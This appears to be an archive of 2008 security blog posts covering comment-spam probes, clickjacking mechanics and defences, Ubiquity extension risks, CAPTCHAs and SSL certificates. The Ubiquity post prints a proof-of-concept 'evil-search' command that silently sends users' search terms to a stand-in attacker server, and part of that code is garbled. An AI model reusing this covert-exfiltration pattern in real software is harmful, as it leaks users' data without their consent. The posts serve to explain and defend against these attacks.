Friday, October 31, 2008

First encounters with a web comment spammer

Jeff Forristal here. I run a couple of personal web sites that host the usual gamut of material found on personal web sites (pictures of my kids and family, my latest favorite LOLcat graphic, etc.). Recently I updated one of my sites and added a new comment/contact submission form so I wouldn’t have to expose my email address for spam harvesters to find. A mere few hours after enabling this new comment submission form on my web server, I started to get some comments; unfortunately they were all comment spam.

Of course, web comment spamming has become yet another fact of life on the Internet. Blogs and forums with unmoderated/open comment submission functionality are quickly getting clogged with random and off-topic spam. Basically the spammers are taking the content they would normally send you in email, and now posting it to web site forums and blogs too. This is why comment moderation and CAPTCHAs are becoming the norm for forum and blog comment posting.

Anyways, there is nothing all that exciting about receiving spam of any variety. However the nature of the comment spam I received caught my eye. Over the course of a few weeks, I received multiple comment spams that all had the same format, but different random values.

Two examples of the comment spam I received were:

Email: cdbiib@orhabg.com
Comment:
jJsAdx <a href="http://aereogakjvpd.com/">aereogakjvpd</a>, [url=http://ubfcdpkfggto.com/]ubfcdpkfggto[/url], [link=http://wiogiusmvjcz.com/]wiogiusmvjcz[/link], http://ejmugotxbmqc.com/


Email: thowea@snkkjo.com
Comment:
fHwI3w <a href="http://uwtsayqpclib.com/">uwtsayqpclib</a>, [url=http://wetpnicpwkfd.com/]wetpnicpwkfd[/url], [link=http://bvtyjneqigek.com/]bvtyjneqigek[/link], http://prcghesjscpl.com/

We can make an educated guess that this comment submission isn’t directly about blindly shoving links onto sites in order to bolster incoming link counts (inflating PageRank ratings and aiding in SEO efforts), because all the links are random and don’t reference real sites. There is no practical value in the data itself that was submitted, except as acting as a probe to see what comes out the other side of the submission process. The data contains four different link formats (an actual HTML <A> tag, two flavors of popular bulletin board markup tags, and just a raw URL), and perhaps a fifth if you count the email address too. That makes me believe the end goal was probably to find a way to inject a clickable link of some sort. Had the action been successful, perhaps the same software would have then subsequently tried to inject more meaningful links (back to our SEO theory). Or, perhaps this was just a pre-cursor scouting application compiling a list of URLs known to allow arbitrary link injection (such lists would commonly be paired or sold with spamware/crimeware apps used to inject content onto listed sites already known to be open to receiving the injection).

Of course, being the curious individual that I am, I started to wonder:

  • The app managed to put something resembling an email address into the email field. Now, sure, the form field name was ‘email’, so it wouldn’t be that hard to deduce; what would happen if I named that field something less obvious ('mail', 'eml', 'e', 'foo')?
  • The links were submitted in a textarea field; will it submit the same type of data in a more constrained input text box?
  • Will it try to inject content into other identifiably named fields, such as 'phone', 'address', 'url', etc.?
  • Does the app support cookies? Is it a well-behaved web user agent? How smart is it?
  • Can the app's injection logic handle multi-step submissions, where you submit to one page/place and the data eventually appears on a different page/place but not within the actual submission response (think: you submit a comment, you get a page that says "thank you", but then have to click one more link before you get to where your comment is actually displayed)?
  • And of course, the million dollar question: what would have happened had their injection succeeded and produced a clickable link?

I’m not one to leave such important questions burning on my mind (heh), so I came up with a plan to get the answers I want. I will lay a trap for the comment spammer (or rather, their app). The idea is simple: through the magic of some server-side logic, I will detect when this comment spamming app is making submissions to my forms (assuming they come back in the future; but historically they seem to visit me on a fairly regular basis, so it seems a safe assumption). Rather than display the usual "thank you for your submission" response, I’ll instead feed a specially crafted response to make it seem like the submission actually produced a clickable link (making me look vulnerable). Further, I will then flag that session/IP as a spammer, and all subsequent requests will result in some extra forms being added to the web page responses. Those forms will be designed with certain characteristics meant to gauge the effectiveness and operation of the application and its web crawler; I’m assuming the app will repeat its typical injection testing process for as many forms as it encounters.

So if all goes accordingly to plan, I intend to post a follow-up to this aptly titled article in a few weeks. The follow-up will of course be entitled "Second encounters with a web comment spammer."

Until then!
- Jeff


Tuesday, October 28, 2008

Ports Are Meaningless

I read an interesting survey today commissioned by FaceTime Communications. This is their fourth such annual report and while the overall findings were unsurprising, it highlights a growing problem - how to control application use as traffic converges on ports 80 and 443. The survey found that employee use of collaborative Internet applications is on the rise and that employees use such applications for personal benefit on company time - no surprise there. This has in turn led to security, bandwidth utilization, compliance and data leakage issues. Some of the more interesting findings are below:
  • 97% of employees utilize 'Internet Applications', defined as IM, P2P, streaming media, collaboration (web conferencing, blogging and social media), VoIP, anonymizers, web mail, etc.
  • 86% use IM
  • 54% use file sharing
  • 69% use VoIP
  • 15% use anonymizers
These statistics are important as they emphasize the increased use of applications that are often not sanctioned or monitored by internal IT, yet can significantly impact the corporate LAN. The larger the attack surface, the more vulnerable a platform becomes. Installing additional applications to a desktop system increases the likelihood that one such application will be vulnerable and open to attack, especially when these applications are not regularly patched. Moreover, such apps can represent costly bandwidth utilization and potential data leakage risk.

Why is it that the use of non-sanctioned applications is on the rise? Have internal security teams given up the fight and handed over desktop control to end users? No. The reality is that end users no longer need admin rights to utilize alternate applications. Why? Many are now web based. You don't need to install a desktop application on your machine, you only need to point your web browser to a Rich Internet Application and any of the aforementioned application categories are readily available online.

What the report did not cover, is what form this traffic takes, how it can be identified and how it can be controlled. A decade ago, network firewalls ruled the security landscape. Preventing access to a particular application/protocol was as simple as blocking a known port. Don't want employees to send files? No problem, block outbound port 21. Telnet? That's port 23. Today however, ports are meaningless. Traffic is converging on ports 80 and 443 for a simple reason - they're always accessible, on any network.

Applications are becoming 'network aware'. They may have a preference for their communication protocol but they will find a way out and their fallback plan is always the web. Take a look at applications such as Skype, Tor or virtually any modern P2P application. If you bock all other means of egress, you will find traffic being tunneled through port 80. When this occurs, ports become meaningless and sysadmins suddenly have their hands full. Today, security solutions designed to hand control back to administrators must understand the language spoken by applications in order to pick it out within the sea of legitimate web traffic. Moreover, vendors must constantly monitor and update their signatures as the traffic patterns are continually changing in order to bypass known controls. Just as we've accepted the arms race between virus writers and AV vendors, we now have an arms race between those seeking to make applications accessible to all and the enterprises seeking to control them.

- michael

Tuesday, October 21, 2008

Ubiquity Foreshadows Future Browser Security Challenges

When I can, I like to investigate emerging open source projects, both to satisfy my curiosity and to gain insight into security challenges to come. I recently stumbled across one such project from Mozilla Labs, known as Ubiquity. The project is described as "an experiment into connecting the Web with language". In a nutshell, it is an Firefox extension which extends browser functionality via natural language queries. When a user invokes Ubiquity via a keyboard shortcut, a text box is displayed where the user can input simple queries and the requests/responses can interact directly with the browser. Let's look at an example:

Access Ubiquity - On my Mac, by default this can be done via Alt-Space

Enter a command - I type "map 1600 Pennsylvania Avenue, Washington DC" as seen in the image to the left. Note that in addition to retrieving a map, in the lower right hand corner of the image there is an 'Insert map in page' link. Clicking on this will automagically embed an the map into an editable section of the page that you're on. This is handy, for example, for embedding maps into webmail messages.

Big deal. Google Maps has been around for years. Why should I care that a plugin has been built to make it easier to look up maps?

Why Ubiquity Changes the Security Landscape

Extensibility - Anyone can develop Ubiquity commands and it's easy to do so. Once a new command has been created, you can deploy it simply by linking to the code on a web page. The Ubiquity extension will recognize the code and prompt users to add the new command. As the Ubiquity user base grows, this certainly streamlines social engineering attacks. While such extensibility is similar to what can be done today with browser extensions, Ubiquity commands can be developed much more quickly and are just as powerful.

Interaction - The Ubiquity query window isn't just a new browser window. Commands have the ability to directly interact with your browser. For example, the built in email command, interacts with your Gmail account (assuming you're authenticated) and allows you to query email addresses from your contacts. This is certainly handy and allows for great interactive Ubiquity commands to be built, but could certainly be abused. How about a rogue Ubiquity command which unknowingly forwards your contact list to a spam bot?

Remote Updates - The authors of new commands can make changes on the fly and the next time the command is called, Ubiquity will use the updated logic. End users do have the ability to accept automatic updates when they first subscribe, but assuming they do, this provides a great Trojan Horse for a less than honest author. They could publish a useful command, wait until it's widely deployed and then change the logic. Take for example the evil-search function which I've published, the code for which is below:

CmdUtils.CreateCommand({
name: "evil-search",

description: "Searches Yahoo! (...and let's me know what you search for...)",

help: "Try issuing "evil aglet"",

icon: "http://www.yahoo.com/favicon.ico",

takes: {"word": noun_arb_text},

execute: function( directObj ) {

var word = directObj.text;

Utils.openUrlInBrowser( "http://search.yahoo.com/search?p=" + escape(word) );

Utils.ajaxGet( "http://localhost/search?p=" + escape(word) );

},

preview: function( pblock, directObj ) {

var word = directObj.text;

if (word.length < innerhtml = "Searches Yahoo! for the provided search term (...and let's me know what you search for...).">


This simple Ubiquity command integrates Yahoo! search functionality. When used, the user will be redirected to a web page displaying results for their query. However, behind the scenes, a second AJAX query is made to an attacker controlled server (left as localhost for illustrative purposes). To see this in action, subscribe to the command, run an evil-search query and check the log files on your local server. A command such as this could be used to keep tabs on searches queried by other users. This is a very simple example. With the power offered by Ubiquity, the sky's the limit. Challenges/Solutions

To be fair, this is a beta project and the team fully admits that security issues will need to be addressed. That said, at present they appear to be pursuing two paths to address the security implications.

End User Warnings - When subscribing to a new Ubiquity command, the user is presented with a big, bold warning letting them know (literally) that evil commands could do anything that they want, including steal credit card information. Warnings such as this are in my opinion, useless (I'm talkin' to you Vista). Relying on end users to determine is something is safe doesn't work as most users don't have the skills to make that determination.

Social Trust Network - The current Ubiquity warning message indicates a plan to create a Social Trust Network, whereby users will rely others to determine if a command is safe. This doesn't fix the problem, it just spreads it out. The approach still relies on users to determine if a feature is safe and given the remote update capabilities of Ubiquity commands, just because a million people agree that a command is safe today, it could be evil tomorrow. If anything, such a network could provide a false sense of security.

In my opinion, the only viable way to secure such a system is to inject a review process. Yes, this reduces the openness of the project and yes this isn't foolproof but people with security expertise and knowledge of Ubiquity need to be involved and that puts the burden squarely on the shoulders of Mozilla. I liken it to malicious Google gadgets, which Google claims to test for vulnerabilities. In a world of mashup technologies, where functionality, not just content, can be created by anyone, a central authority must take responsibility for protecting end users.

Ubiquity is a great project and I hope that it succeeds. I just hope that better security is implemented before this project goes prime time.

- michael

BlueHat v8 After-Thoughts

Hello everyone, Jeff Forristal here. Last week I ventured over to Redmond to attend BlueHat v8. For those of you unfamiliar with BlueHat, it's Microsoft’s security conference that they put on for their internal developers (and select partners/third-parties). This year was slightly different than years past, as all of the talks were not under NDA. I heard the recorded talks may wind up on Microsoft Technet as public on-demand webcasts, but they haven’t been released to date.

Anyways, I thought I would give you a few interesting highlights and some food for thought. The first comes from the "Crimeware: Behind the scenes" talk given by Iftach Amit of Alladin. Basically the moral to his story is simple: malware is now a business. There is real money to be had; we are no longer dealing with bored teenagers who make viruses simply because they can (well, they are still around too, but they are hardly the majority threat anymore). There is now financial incentive to make better malware, and thus I suspect we are going to start seeing more creative malware tactics in the future. But there were two interesting things I want to point out (derived from information Amit presented). First, the crimeware/malware business model contains strong parallels to online advertising business models—syndication by smaller sites from a large distribution agency, high-value placements on popular/busy web sites, and impression/click tracking. Other than substituting a piece of malware for an ad, it seems everything else is virtually identical between the two models...right down to the tools used, payment relationships, pricing structures, etc. Second, Amit mentioned that his company recovered a log file from a crimeware server that had 200,000+ web site FTP credentials in it. Think about that: 200,000 legitimate web sites that the attackers could arbitrarily change and introduce malware to. This really calls into question the value of web site reputation systems, if reputable websites can be switched over to host malware at a moment's notice. It really doesn't matter if the site was angelic yesterday (or an hour ago) because it can be evil today. Real-time classification and scanning seems to be the burgeoning practical solution.

I was having a discussion with Dave Weinstein, a Microsoft senior security developer, and he made a really good point: making an arbitrary guess, there are how many competent security experts in the world? 5000? He noted that Microsoft alone had ten times that many developers on staff (which I can’t confirm, but I can confirm Microsoft reporting
85,000 certified application developers as of September 2008). It's probably a safe guess to say the number of developers in the world measure in the millions. Overall, this is a really important correlation: the amount of developers in the world outnumbers the amount of security experts by a seriously significant factor. There simply isn't enough security expertise to go around, and so there needs to be investment in making security as distilled and accessible to developers as possible. Mind you, the goal is not to turn developers into security experts...they already have their skill specialty (development), and we should not force them to be dual-specialists (it's just not going to happen for the vast majority). Developers need simple steps and processes for dealing with security that does not require them to thrive in the particulars of security. Which brings me to the second day of BlueHat v8, focused on Microsoft's Security Development Lifecycle.

The day was kicked off with some perspectives on threat modeling. Now, I've done my fair share of threat modeling, and I often find it technically repetitive and numbingly demanding of small nuances to the point of de-motivating me from wanting to do it again. And yet, I was a bit inspired by the way Danny Dhillon described how EMC distilled the threat modeling process to the bare essentials, thus making it more manageable for the average developer. They actually managed to move threat modeling towards a "list of checkboxes" model...which we all know scales much better than an open-ended "just think of all the bad things someone could do to your app" thought exercise. Adam Shostack from Microsoft also demo'ed Microsoft's new version of their internal threat modeling tool—which they plan on releasing to the public eventually (November 2008, if all goes according to plan). It's cool and nifty, but personally I'd really like to get my hands on the EMC tools.

Later in the day a gaggle of Microsoft engineers gave a presentation on the use of fuzzers within Microsoft. I didn't know Microsoft had embraced fuzzers to the level that they have--apparently they have internal SDL mandates to file-format fuzz anything that can read a file...and that encompasses over 300 different file parser components in Vista alone. There is a lot of public opinion by security experts dismissing fuzzing, but I believe that's purely because of fuzzing's no-expertise-required approach and lack of sexiness. The basic fact is that fuzzing, when done correctly, is a simple and inexpensive way to flush out bugs--and it's something that non-security developers can wield and understand. Plus you have to keep in mind that some enterprising hacker type will probably use a fuzzer against your product eventually, so you might as well find the problems before they do. Anyways, Microsoft has committed a lot of internal resources into really streamlining the fuzzing process. They've developed a significant internal suite of fuzzing tools, and they've even done long-term research to determine where the point of diminishing returns lies for their fuzzing efforts. It doesn't seem likely that Microsoft will ever release their fuzzing tools to the world, but it shouldn't be difficult for other organizations to adapt Microsoft's methodology to the plethora of publicly-available fuzzers. A good place to start would be the book
Fuzzing: Brute Force Vulnerability Discovery by Zscaler’s own Michael Sutton (I felt obligated to make a shameless plug on his behalf :).

Overall, BlueHat v8 was a great time (as always). The chance to hobnob with other industry security experts and leaders always yields some insightful takeaways. Personal thanks to everyone at the BlueHat conference...organizers, speakers, and attendees...for making it a pleasant and engaging opportunity to mingle with security-minded peers.

- Jeff

Wednesday, October 15, 2008

Plotting the Death of CAPTCHAs

I hate CAPTCHAs. No, I really hate CAPTCHAs.

CAPTCHA stands for "Completely Automated Public Turing test to tell Computers and Humans Apart", an acronym coined by Luis von Ahn (Carnegie Mellon University), Manuel Blum, Nicholas J. Hopper (Carnegie Mellon University) and John Langford (IBM) in 2000. CAPTCHAs were used initially by web email services to prevent spammers from automating account creation but are now used by a variety of web applications and are also leveraged as a control to prevent Cross Site Request Forgery (CSRF) attacks. In plain English, CAPTCHAs are those truly annoying, psychedelic images of words and phrases which end users are supposed to be able to easily interpret while computers can't. The problem - they don't work - on either front.

Now I like to think of myself as a reasonably intelligent person. After all, I made it through school and can even complete the first level of Super Monkey Ball. That alone has to place me above average in the gene pool, right? However, when it comes to CAPTCHAs, I'm definitely CAPTCHA impaired. I can't tell you the number of times that I've failed a CAPTCHA test, but forget about me, I'm not the average web surfer anyway. My test for the user friendliness of any good security control in simple - will it be transparent for my Mom? Keep in mind that this is a woman who still owns a VCR which continues to flash '12:00' in her living room. Let's look at few CAPTCHAs to see if Mom will be able to handle them.

Ticketmaster
Now this one isn't too bad. I can read the words 'views wells mr and' but does capitalization count? What about that period before the word 'and'?

Verdict: Mom will ultimately get this one, but only after a phone call to me and that's long distance, so that's unacceptable.

Gmail

Hmmmm....could be 'malcurun', 'malairim' or something in between. Let's go to the dictionary...oh wait, whatever it is, it's a made up word, no help there.


Verdict: This one will definitely throw Mom for a loop.

Windows Live
Is that a 'K' or an 'I' dating a pregnant 'L'?



Verdict: Not gonna happen.

Facebook
Whoa. I'm not even going to guess at that first word.



Verdict
: There's no way that Mom's going to get this one either but she (and I) shouldn't be using Facebook anyway so we'll give this one a pass.

Now if visual CAPTCHAs aren't you're forte, or if you're visually impaired, the propeller heads behind this user friendly security control also have audio CAPTCHAs. For example, since I didn't like the Ticketmaster CAPTCHA above, Ticketmaster also made available, an audio file. Now I don't know about you, but that sounds to me like a crew of monotone people partying in a tunnel and randomly throwing out numbers - not much better.

Now I've argued why CAPTCHAs fail in their goal to be user friendly, but they also fail in preventing and detecting automation. An article published yesterday by MIT's Technology Review discusses how CAPTCHAs are improving AI as researchers continually work be beat various CAPTCHA schemes. I'm not sure that CATCHAs can take credit for assisting our leap into the future but it does illustrate the arms race that will continue. No matter what CAPTCHA scheme is devised, it will ultimately be defeated. Microsoft, Google and Yahoo! have all been forced to change their CAPTCHA technologies after it was revealed that automated attacks had broken their schemes. However, this arms race is rather pointless so long as economics allow for a profit to be made by employing workers in third world countries to interpret CAPTCHAs. It's a bit depressing to learn that uneducated workers are apparently not CAPTCHA impaired.

Alternative Approaches

There are other, user friendly ways to gain confidence that human beings are sending requests as opposed to computer scripts and the answer isn't building a better mouse trap. Variations of CAPTCHAs such as audio files, puzzles, photos, animation, etc. are just as flawed. They aren't user friendly and they too will ultimately be broken. So what can you do?

Take it offline
If your goal is to gain assurance that a human being is involved in the process, take the challenge/response offline. Require that the user respond to an email message, text message or if you really want to be sure, a phone call.

Ask Questions
Ask a question that the user should know but an automated script wouldn't have the intelligence to respond to.

Nonce Values
If you're using CAPTCHAs to prevent CSRF, stop it. CAPTCHAs, beyond all of my previous arguments, rely on human beings, the weakest link in any security chain. Just because you throw a CAPTCHA at a person to ensure that they intervene before doing something stupid like transferring funds, doesn't mean that they won't do it. After all, we've been trained to (try to) answer CAPTCHAs when they're presented. CAPTCHAs have turned us into the digital equivalent of Pavlov's dog. A better alternative is to inject nonce, or a one time value into web forms so that receiving pages can confirm that the request came from the appropriate web form, not from pre-populated values in a spam email link. OWASP projects such as J2EE CSRFGuard, .Net CSRFGuard and the OWASP Enterprise Security API can assist with this.

Can the aforementioned alternatives be bypassed? Of course, but let's keep our goal in mind. Security, especially in services targeted to the general public, must remain as transparent as possible. There is no such thing as bullet proof security, only security that mitigates risk to an appropriate level. Is security an appropriate argument for driving customers away? I don't think so.

It's time for CAPTCHAs to die. If for no other reason, it will make me (and my Mom) happy.

- michael

Thursday, October 9, 2008

Clickjacking Defenses

[Update: 10/15/08 - Adobe Flash Player 10 is now available for download, which addresses the webcam/microphone hijacking scenario described below.]

Since I last blogged about clickjacking two days ago and posted a demo, plenty of additional information has emerged, including the original researchers, Jeremiah Grossman and Robert Hansen breaking their silence in light of attack details now being public. Robert provides a detailed list of the status of all known clickjacking related issues, noting whether they have been resolved or if resolution is expected in the near future.

Given that the majority of necessary vendor patches to address clickjacking are not yet available, I'd like to take this opportunity to discuss some practical interim workarounds to defend against clickjacking. Keep in mind that while clickjacking affects a web user, as with most client side vulnerabilities, preventing the attack is a shared responsibility among web site administrators, software vendors and end users. We don't have any control over software vendors, so I'll instead focus on what website administrators (server side) and end users (client side) can do to protect themselves.

Server Side Protections
  • Frame busting - All of the clickjacking demonstrations that I've seen to date require that the targeted site, which the attacker wants a victim to click on, be contained in an IFRAME on a page which the attacker controls. According to Robert, the need for IFRAMEs can be bypassed using ActiveX controls if they don’t use traditional modal dialogs, but rather rely on on-page prompting. However, inserting 'fame busting' code on sensitive pages is at least one solid protection that site administrators can do to prevent their clients from falling victim to clickjacking attacks when the attacker is using IFRAMEs. The following code will ensure that a page is not displayed within an IFRAME:
<script type="text/javascript">
if(top.location != location) {
top.location.href = document.location.href;
}
</script>
  • Randomize URLs - Clickjacking requires that the URL of the site to be clickjacked is known. Therefore, URLs for pages with sensitive actions (e.g. password reset) could be dynamically generated. This would of course prevent static links from other applications.
  • Randomize Layout - Cickjacking also requires knowing the location of the object to be clicked on so that the overlay page is properly positioned. Therefore, randomly changing the position of a sensitive page element such as a submit button would increase the level of difficulty for a successful clickjacking attack. This however could be challenging for many sites as page layout can't be adjusted without changing the overall look and feel of the page.

Client Side Protections

One of the most concerning attacks related to clickjacking involves changing a user's Adobe Flash Player settings to allow the attacker's site to enable and access a victim's webcam and microphone. This allows clickjacking to be used for surveillance as seen in a demonstration video posted at guya.net. The Adobe Flash Player mitigations in the list below are therefore designed to address this specific attack but keep in mind that Adobe is only one affected vendor.
  • Pull the plug - The only sure fire way to prevent your webcam and microphone from being hijacked is to disable them. This of course has the obvious implications of killing hardware that will be useful elsewhere but you may want to consider it. Depending upon your system this may require changing O/S settings, BIOS settings or simply pulling the plug.
  • Adobe Flash Player Settings Manager -Flash Player settings can be adjusted manually. In fact, the aforementioned attack is doing exactly this by tricking the user into changing their settings via clickjacking. In order to access the appropriate settings you can right-click on any embedded Flash video and select 'Settings --> Advanced' or just use the links below.
    • Global Privacy Settings - Global settings address all sites using Flash, regardless of whether they are newly encountered or already have site specific rules applied from past visits. Select 'Always Deny' to ensure that sites can never access your webcam or microphone. Keep in mind however that this setting can be clickjacked so it's far from a foolproof defense
    • Website Privacy Settings - This panel will allow you to set rules for specific sites if you'd prefer to not block access for all sites.
  • mms.cfg - According to the Adobe advisory, in addition to the method above, webcam and microphone access from within Adobe Flash player can also be diasabled by changing the confirguration file directly. This is a better approach as this change cannot be reset through clickjacking. Directions for doing this are provided on page 57 of the Adobe Flash Player Administration Guide, but based on my research, the mms.cfg file is only used by Adobe Flash Player 8, and not in 9.
  • NoScript - NoScript is a handy FireFox plugin which permits granular control to restrict client side scripting on websites and even has some decent XSS protections as well. They've extended this functionality to defend against clickjacking by doing the following three things.
    • ClearClick - ClearClick will prevent UI interaction with embedded objects if they're obstructed or not clearly visible.
    • Opacize Embedded Objects - This setting will make visible, those page elements hidden using CSS with the opacity value of elements set to '0'. This is in my opinion the best defense to date as it won't break the functionality of any sites, but it will empower the user to see any clickjacking attempts.
    • Frame Breaker - Additionally, NoScript has frame breaker emulation for frames where JavaScript is disabled.
While the NoScript functionality is a positive step forward in lieu of no vendor patches, I'll forewarn you that I've encountered some false positives in my testing thus far. My recommendation is that you enable ClearClick only for Trusted Sites, but use the Opacize Embedded Objects setting for both Tusted and Untrusted sites to maximize coverage while minimizing false positives. To summarize, there is no silver bullet to protect against clickjacking, but there are at least a handful of steps that can be taken to mitigate the risk.

As with most problems in life, if the aforementioned still leaves you with worries, a little duct can solve your problems - this time by being placed over your webcam.

- michael

Wednesday, October 8, 2008

The Obfuscated TCP project

Hello, Jeff Forristal here. In my last post I talked about the desire of some folks to use SSL for encryption purposes but forego the authentication components (via the use of self-signed SSL certificates). Overall it’s not a very good idea, since removing authentication from the process renders the benefit of the encryption moot for all but the most trivial (and lazy) threat vectors (passive eavesdropping).
So earlier this week I ran across a mention of the Obfuscated TCP project (a.k.a. ObsTCP), developed by Adam Langley of Google. The project is self-described as:
Obfuscated TCP is a transport layer protocol that adds opportunistic encryption. It's designed to hamper and detect large-scale wiretapping and corruption of TCP traffic on the Internet.
This sounds like an ideal potential alternate for all of those who wish for an 'encryption without (expensive public CA certificate-based) authentication' solution. The ObsTCP idea is simple: use light-weight and fast encryption functions to obfuscate all TCP data streams, in an effort to thwart passive eavesdropping. Processors are fast enough these days that the additional overhead to perform the data obfuscation is negligible. And (from my interpretation of the project’s documentation), the idea isn’t to be cryptographically secure transport and/or replace SSL…it’s just to obfuscate TCP data enough to make passive eavesdropping difficult to do. We are already seeing similar approaches deployed via P2P clients to bypass ISP-based throttling based on packet/protocol inspection; the obfuscation employed isn’t robust to survive a targeted cryptographic attack, but it is enough to make high-speed protocol detection and classification difficult. The project has produced a video (hosted on Youtube) that goes over the basic goals and reasoning behind them.
Looking at the project's history, the original intent seems to be for ObsTCP to be added into the TCP/IP protocol stack (ISO layer 4) for transparency. However, apparently the ObsTCP project approached the IETF with a draft, and, ... well ..., it got a chilly reception. So ObsTCP changed gears and instead moved up the stack to the application layer (ISO layer 7), and is now focusing on HTTP as their first high-value protocol target. So the original project description of ObsTCP being a "transport layer protocol" is a bit misleading when considered in the context of the project's new implementation direction.
So how does ObsTCP work? Well, it requires an ObsTCP-capable client and server. The server admin essentially embeds the server's public key (and some meta information) in a DNS entry related to the server. The client retrieves the server's public key, opens a connection to the ObsTCP port of the server, and then uses a Diffie-Helman authentication exchange to negotiate a key to use for subsequent encryption. Right now the project is offering proof-of-concept patches for Firefox browser, and Apache and lighttpd web servers to make them ObsTCP-capable. They also offer an ObsTCP-to-normal-TCP proxy which can be placed in front of TCP services to make them ObsTCP-capable.
Overall, how does ObsTCP compare against the threat vectors previously listed in my "SSL encryption without authentication debate" post? We already mentioned that passive eavesdropping would be thwarted, as that's the purpose of ObsTCP to begin with. But what about a more active man-in-the-middle (MitM) attack? My cursory review of the ObsTCP documentation and design indicates that it does not directly mitigate that specific threat vector—however, it does make it harder for an attacker to pull off. This is because the server's public key is distributed via DNS, separate from the TCP connection. That means an attacker has to intercept both DNS request and the TCP connection in order to successfully pull of a MitM attack. Further, the DNS records can be cached at various points around the Internet, making it further difficult for the attacker to spoof a DNS response. The attacker would likely have to employ separate specific DNS attacks (such as the recent Kaminsky brouhaha) just to inject the right info into DNS in order for the TCP intercept/MitM to correctly work. The amount of effort and coordination to pull this off is far greater than a single TCP intercept/MitM attack by itself.
Overall the ObsTCP project is in alpha stages, but the idea is intriguing. It does seem to fill a need that is growing and becoming more vocalized (i.e. encryption without authentication). It will be interesting to see whether the project becomes adopted enough to start gaining public traction and attention. We figure it will be the usual circular catch-22 situation often encountered with new Internet technology: server admins forego deploying the technology because not enough clients support it, and clients forego implementing the technology because not enough servers support it. Oh well, it’s still a good idea.
- Jeff

Tuesday, October 7, 2008

Clickjacking Demystified

I've recently commented on the controversy surrounding the Clickjacking talk that was to be given by Jeremiah Grossman and Robert 'RSnake' Hansen at the OWASP USA 2008 conference, which was pulled at the last minute due to a request from Adobe. At the time, I discussed my concerns that the best and the brightest would soon step forward to reveal the mystery before the vendors could beat them to the punch and it appears that this has indeed transpired. Details have been leaking out throughout the past couple of weeks and by borrowing from the work of HD Moore and Michal Zalewski, I've put together a demonstration of what is emerging as the consensus for what Jeremiah and Robert were to talk about.


Clickjacking Demo


HD did most of the heavy lifting but I'll take this opportunity to break down what is happening here.

What is Clickjacking?
Clickjacking is a social engineering attack, whereby a victim is tricked into clicking on one or more hidden links on a page. When the victim clicks on links of the attacker's choosing they are performing some action that they didn't intend to do, but which benefits the attacker. In the demo you're simply adding a Google News Alert for 'Zscaler' to your profile but this same approach could be used for a variety of attacks such as forcing a user to reset their password, transfer funds, post content, etc.

How Does the Demo Work?
The demonstration above has the following components:
  • IFRAME - While no data is traversing between domains, the attacker is convincing the victim that they are looking at content from one domain (e.g. Zscaler), while in reality the browser is interacting with another domain (e.g. Google). This is accomplished by opening the ultimate target in an iFRAME and obfuscating the content, while the visible content is layered overtop and displayed on the main page itself.
  • Layering - In order to ensure that interaction (e.g. mouse clicks) affects the hidden target page, elements are layered on top of one another. In the demo, the 'Click Here' button has been given a z-index value of '-10'. This ensures that while the ultimate target may not be visible due to obfuscation (see below), mouse clicks will actually interact with the 'Create Alert' button on the Google News page
  • Obfuscation - While the full Google News page has been rendered by the victim's browser, it is not visible as the opacity value of the iFRAME element containing the page has been set to '0'.
To summarize the demo, while it may appear that you are clicking on a blue 'Click Here' button, you are actually clicking on a hidden 'Create Alert' button on the Google News page. Assuming that you have already authenticated to Google within the same browser instance, that one single click will add a Google News alert for 'Zscaler' to your profile. The demonstration does not require JavaScript, which was highlighted by Jeremiah and Robert as a reason why this attack was particularly malicious. This particular demonstration required nothing more than HTML and CSS - something that virtually all browsers support.

I have no doubt that when the details are finally revealed, that Jeremiah and Robert will have a few more tricks up their sleeves to raise the bar on this issue to an even higher risk level but I'm confident that the basis of the attack is now public. It appears that Jeremiah will reveal full details of clickjacking during a keynote at the Hack in the Box conference in Malaysia on October 29th.

- michael

Friday, October 3, 2008

The ‘SSL Encryption without Authentication’ debate

Every so often I encounter a debate where an individual is making a case for the value of supporting/accepting self-signed SSL certificates in browsers. Basically their argument is “I do not care about authentication of SSL, I just want the encryption part…so why should I have to pay VeriSign or another commercial CA all that money for an SSL certificate that verifies my identity?” This question seems to be newly fueled by the fact that Firefox 3 now requires the user to go through a laborious 4-step process to allow the browser to connect to an SSL site utilizing a self-signed certificate.

The problem is: anyone who asks the above question is ignoring how SSL works and how SSL employs encryption in the first place. If you are trying to keep an evil person from learning your secrets, but you do not authenticate who you are talking to, you are basically overlooking that you may well be telling your secrets to the evil person directly! If you don’t authenticate the identity of someone, they are essentially an unidentified stranger to you. And the idea of wanting to keep your secrets from strangers (i.e. encryption) but also be willing to give your secrets to strangers (i.e. no authentication) is contradictory. If you have no idea of who you are talking to, then what value is the encryption really providing? How do you tell a complete stranger a secret in private and still expect the secret to remain safe from strangers?

Let’s look at how SSL tackles authentication via the use of certificates. A signed (i.e. authenticated) certificate is essentially a digital record that says “My name is Bob, and this big trusted company over here agrees with that statement.” The idea is that browsers trust a set of big trusted companies (Certificate Authorities such as VeriSign, Thawte, etc.), and that creates a trust chain: we trust the browser, the browser trusts the CA, the CA says this is Bob, so we trust it is Bob. On the other hand, a self-signed (i.e. non-authenticated) certificate is a digital record that says “My name is Bob, and you will just have to trust me that what I am saying is true.” It’s almost like the honor-system approach of everyone stating who they are; but how do we know if they are lying? Essentially, you don’t…because self-signed certificates can be created by anyone to say anything (that is the whole purpose of self-signed certificates). An evil attacker can trivially generate certificates that say “My name is Paypal, and you will just have to trust me,” “My name is eBay, and you will just have to trust me,” “My name is Bank of America, and you will just have to trust me,” etc. The only thing that prevents the attacker from deceiving you with these malicious self-signed certificates is your browser’s better judgment of not trusting these arbitrarily fabricated declarations of identity having no proof. Remember: security is about keeping you safe despite lies and deception; we need to ensure that a simple lie by an attacker won’t compromise the entire process. In this case, self-signed certificates offer a way for attackers to lie about their identity with impunity.

